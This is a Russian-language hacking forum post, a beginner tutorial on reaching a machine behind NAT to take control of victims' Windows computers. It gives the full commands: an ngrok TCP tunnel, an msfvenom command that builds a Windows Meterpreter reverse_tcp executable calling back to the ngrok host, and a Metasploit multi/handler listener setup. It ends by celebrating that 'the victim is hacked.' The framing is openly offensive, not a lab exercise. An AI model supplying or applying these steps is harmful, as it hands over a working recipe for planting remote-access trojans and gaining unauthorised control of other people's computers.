Что нового?

Взлом для начинающих [часть 1] | metasploit + ngrok. {kali linux}

3xpl01t

Участник

3xpl01t

Участник
Регистрация
5 Авг 2019
Сообщения
7
Симпатии
6
eRUB
141
#1
Привет хацкер, сегодня мы рассмотрим возможность устанавливать TCP соединение обходя NAT.

Нам понадобятся: Metasploit, Ngrok.
Ngrok — это платформа, которая с помощью установленной утилиты, позволяет, организовать удалённый доступ на веб-сервер или какой-то другой сервис, запущенный ПК. Доступ организуется через созданный при запуске ngrok безопасный туннель. ПК, при этом, может находиться за NAT’ом, и не иметь статического IP адреса.​
Metasploit Project — проект, посвящённый информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплойтов.​

Приступим!
Для начала нам понадобится Ngrok, для того, чтобы его установить, переходим на официальный

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

проекта.

Здесь нам необходимо выполнить простую процедуру регистрации:

39e646da-dd37-49ad-8c52-07d4157147c4.png


Теперь перейдём к установке, исходя из вашей битности кали, выбираем именно нужную версию:
cd1863cb-1559-47fd-8ae4-c8d4269bc343.png


Скачиваем, распаковываем, вводим токен, профит!11! (Все подробные моменты установки есть выше на картинке)

Теперь нам нужно поднять tcp соединение, делаем это командой в терминале:
./ngrok tcp 4444
Где 4444 - номер порта, tcp - тип соединения.

76f8aa9c-7636-4134-a764-cde81c9d96d1.png


В этом окне нам понадобится лишь это:
tcp://0.tcp.ngrok.io:12529


Это значит, что все запросы, которые отправляются на 0.tcp.ngrok.io через порт 12529 (в моём случае), будет перенаправлен на вашу тачку с портом который мы указали при запуске ngrok (4444). Терминал не закрываем, двигаемся дальше.

Открываем новый терминал сочетанием клавиш Shift + Ctrl + N
Здесь нам нужно создать пейлоад.

Пейлоад / Полезная нагрузка (payload)часть червя, которая производит деструктивные действия с данными, копирование информации с заражённого компьютера и т. д. (в отличие от «транспортной части червя» («инфекционной» части, эксплойта), которая занимается его доставкой на атакуемую машину и заражением машины.

msfvenom -p windows /meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=ВАШПОРТ -f exe> payload.exe

ee7e151f-0b46-467b-a2bc-be7d3e2d7e1d.png


Пейлоад готов! Осталось его запустить на другой машине, и сессия метерпретер у вас в кармане, но перед этим, нам нужно запустить "слушатель", который будет прослушивать порт 4444 для соединений. Делаем мы это командами в терминале:

Форматирование (BB-код):
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
24513682-58e0-4c5a-957c-8fe6cf81467e.png


Теперь, когда слушатель запущен, все TCP соединения перенаправляются нам на машину. Если пользователь запустит наш пейлоад, мы получаем активную сессию meterpreter:
fca5e921-ad71-4639-9153-cf1a4fec417d.png

30ab3cb2-7aa5-4573-838a-c050bf8571ec.png


Список команд можно узнать командой: help

Вот и всё, жертва взломана, мы довольны.
Это одно из многочисленных способов использования Metasploit, для заражения машин.


Остались вопросы?
- Задавай их в этой теме, или в моей личке, удачи.
 
Сверху Снизу